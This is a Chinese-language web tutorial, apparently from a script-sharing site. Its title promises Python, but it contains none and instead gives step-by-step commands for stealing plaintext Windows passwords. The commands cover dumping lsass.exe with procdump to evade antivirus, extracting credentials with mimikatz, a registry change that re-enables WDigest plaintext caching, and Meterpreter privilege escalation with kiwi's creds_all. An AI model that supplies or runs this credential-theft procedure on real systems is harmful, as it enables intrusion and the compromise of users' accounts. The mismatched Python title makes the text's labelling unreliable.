python簡單直接獲取windows明文密碼操作技巧
01、Procdump+Mimikatz
利用procdump+Mimikatz 繞過殺軟獲取Windows明文密碼。
(1)工具準備:
ProcDump:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
mimikatz:
https://github.com/gentilkiwi/mimikatz/
(2)Windows Server 2008 R2提取明文密碼
在目標機器上生成存儲文件:
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

將lsass.dmp復制到本地,使用mimikatz 一行命令將結(jié)果輸出到文本。
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"> pssword.txt
如圖:成功從內(nèi)存中提取明文密碼。

02、Window 2012 R2抓取密碼
在Windows2012系統(tǒng)及以上的系統(tǒng),默認在內(nèi)存緩存中禁止保存明文密碼的。攻擊者可以通過修改注冊表的方式抓取明文,需要用戶重新登錄后才能成功抓取。
(1)修改注冊表
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
(2)用戶administrator注銷后重新登錄,成功抓取到明文信息。
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt

03、MSF kiwi模塊
使用kiwi模塊需要system權(quán)限,所以我們在使用該模塊之前需要將當前MSF中的shell提升為system。
提到system有兩個方法,一是當前的權(quán)限是administrator用戶,二是利用其它手段先提權(quán)到administrator用戶。然后administrator用戶可以直接getsystem到system權(quán)限。
meterpreter > getuid Server username: BYPASS-E97BA3FC\Administrator meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
加載kiwi模塊:
load kiwi
列舉系統(tǒng)中的明文密碼:
creds_all

以上就是python簡單直接獲取windows明文密碼操作技巧的詳細內(nèi)容,更多關(guān)于python獲取windows明文密碼的資料請關(guān)注腳本之家其它相關(guān)文章!
相關(guān)文章
Python猜解網(wǎng)站數(shù)據(jù)庫管理員密碼的腳本
這篇文章主要和大家分享一個Python腳本,可以實現(xiàn)猜解網(wǎng)站數(shù)據(jù)庫管理員的密碼。文中的示例代碼講解詳細,需要的小伙伴可以參考一下2022-02-02
Python人臉識別第三方庫face_recognition接口說明文檔
Python人臉識別第三方庫face_recognition接口簡單說明,及簡單使用方法2019-05-05
Python使用ChainMap實現(xiàn)組合數(shù)據(jù)魔法實例探究
這篇文章主要為大家介紹了Python使用ChainMap實現(xiàn)組合數(shù)據(jù)魔法實例探究,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進步,早日升職加薪2024-01-01
Python?Fuzzywuzzy庫基本函數(shù)及模糊字符串匹配應用實戰(zhàn)
fuzzywuzzy?是一個用于模糊字符串匹配的?Python?庫,它基于編輯距離算法,提供了多個函數(shù)來比較字符串之間的相似性,在實際開發(fā)中,字符串匹配是一項常見但具有挑戰(zhàn)性的任務,用戶可能犯拼寫錯誤,使用縮寫或者輸入同義詞,因此,我們需要一種方法來處理這些情況2023-12-12

